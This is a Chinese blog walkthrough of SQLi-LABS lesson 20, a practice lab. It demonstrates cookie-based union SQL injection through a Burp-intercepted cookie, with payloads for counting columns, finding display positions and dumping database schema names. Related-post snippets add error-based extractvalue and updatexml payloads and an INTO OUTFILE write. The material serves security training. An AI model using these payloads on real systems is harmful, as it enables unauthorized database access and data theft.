SQLi LABS Less-20

最新推荐文章于 2024-03-03 15:31:54 发布
最新推荐文章于 2024-03-03 15:31:54 发布
阅读量1.4w 收藏 2
点赞数 3
分类专栏: SQLi-LABS 靶场通关教程 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/118121218
版权

第二十关请求方式为POST请求 , 注入点为 单引号字符串型 , 注入方式为 联合注入 

通过 cookie 注入

 

第一步,判断注入方式

先看源码

账号和密码对特殊字符进行过滤 , 固 不能使用常规注入

登录成功会保存 cookie , 有一个根据cookie中的用户名查询的SQL 并且从cookie中获取的用户名没有过滤 , 同时查询的结果会展示在页面中 , 我们可以通过修改 cookie中 uname的内容 进行联合注入

 登录成功后有显示位 , 固 可以使用联合注入

 

我们使用 Burp工具 进行代理拦截 , 刷新网页触发拦截

 

第二步,获取字段数

使用 order by 从第1列开始排序 , 直至没有该列

Cookie: uname=admin' order by 4 #

第4列时出现异常 , 固 字段数为3

 

第三步,获取显示位置

使用联合查询获取字段显示的位置

Cookie: uname=-1'union select 1,2,3 #

 

第四步,脱库

Cookie: uname=-1'union select 1,
(select group_concat(schema_name) 
from information_schema.schemata)
,3 #

按照此方法继续获取表,获取字段,直至脱库

 

 

 

 

士别三日wyx
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
Sqli-labs靶场第20关详解[Sqli-labs-less-20]自动化注入-SQLmap工具注入
最新发布
m0_73615178的博客
03-03 737
设想如果在Cookie尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。登录后会有记录 Cookie 值。在Cookie 处加上*代表注入点。
sqli-labs详解------持续更新
yuqie的博客
06-20 2353
如今已经很少使用手动注入了,写这篇的初心在于掌握并熟记手动注入,
sqli-labs Less20
m0_60829468的博客
11-09 3078
说明 20关在传入参数时会生成cookie,对生成的cookie可以实行注入。 提交参数的第一个数据包 第二个数据包 一、对第二个数据包的cookie实行注入 Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(database()),0x7e)) # 二、查表 Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(select table...
sqli-labs之sqlmap初体验
rev1ve的博客
08-07 494
为了更深入学习sqlmap,打算对sqli-labs进行SQL注入测试学习内容包括不同的请求方式和请求参数,总之写下这篇博客记录我的学习过程。
sqli-labs (less-20)
kukudeshuo的博客
03-11 301
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
sqli-labs/Less-20
m0_71299382的博客
11-18 204
sqli-labs第二十关
Sqlilabs Less-20
Light_inthe_eyes的博客
03-08 225
当正确输入后,页面回显cookie,猜测此注入点在cookie: 用burpsuite抓包,证明猜测: 爆库: Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database())),0)#; 爆表: Cookie: uname=admin' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema
sqli-labs:less-20
羽的博客
09-10 147
回显了很多http头。 注入点应该就是cookie头 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-...
sqli-labs————less 20
Fly_鹏程万里
05-12 1596
Less-20这里做一个简单的测试:username:adminpassword:aaa从上面的显示结果中,我们看到了user-agent、COOKIE的内容,我们这里查看一下源代码看看,到底是怎么回事:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs安装与less1-20解法
qq_43936524的博客
12-08 632
文章目录sqli-labs环境安装Basic Challengesless1联合注入时间注入报错注入布尔注入sqlmapless2less3less4less5less6less7less8less9less10less 11通过闭合直接查询sqlmap -techniqueless12less13less14less15less16less17 sqli-labs环境安装 sqli-labs下载地址:https://github.com/Audi-1/sqli-labs phpstudy下载地址:http
sqli-labs-master通关之LESS20-LESS25
weixin_43726831的博客
10-09 823
SQL注入之sqli-labs-master LESS-2020关 POST交互方式下的cookie字段注入 第20关正确的回显页面如下图所示 从图中可以看出这一关是与cookie有关,正确的页面进入后,只有一个按钮Delete your cookie! cookie是客户端记录的会话信息,session记录服务器端的会话信息,此时客户端已经记录了与服务器端交互的会话内容,由此可推断出,注入...
sqllabs 10到20关解法
j2941174356的博客
09-05 119
sqllabs 11-20关解法 burpsuite 对 sqllabs 抓包 出现的问题以及解决办法
SQL注入实操(SQLilabs Less1-20)
wutiangui的博客
07-16 827
union会自动压缩多个结果集合中重复的结果,使结果不会有重复行,union all 会将所有的结果共全部显示出来,不管是不是重复。第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。可以发现不管是在前面还是后面,都是抛出同样的错误,说明只要有报错,就直接抛出报错信息,不合并。这样是不符合sql语法规则的,因此会报错,若没报错,说明有多是被过滤掉或有其他防护手段。union:会对两个结果集进行并集操作,不包括重复行,同时进行默认规则的排序。
sqli-labs 1——20关攻略
weixin_45880717的博客
01-18 1169
1~10 GET传输 Less-1联合查询[ ’ ] 优点:查询方便 速度很快 缺点:必须要有显示位 1、判断sql语句中一共返回了多少列 order by 3 --+ 对比如下两张图的显示页面。得知有3列 2、查看显示位 union select 1,2,3 --+ 3、爆数据 union select 1,2,database() ## 当前数据库名 4、爆库名 union...
sqli labs less 20
Xiaoxiaoqiang_的博客
03-04 171
sql注入
Sqli-labs之Less-20和Less-21和Less-22
→_→
04-15 2869
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
sqli-labs-less-7
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来实现注入。 根据引用和引用提供的信息,我们可以得出以下步骤: 1. 构造注入语句:在URL参数中使用单引号来闭合原始查询,然后使用UNION SELECT语句来执行额外的SQL查询。在这个例子中,注入语句是?id=-1')) union select 1,user(),database()。 2. 将查询结果导出到文件中:使用INTO OUTFILE语句将注入的查询结果导出到指定的文件路径。在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值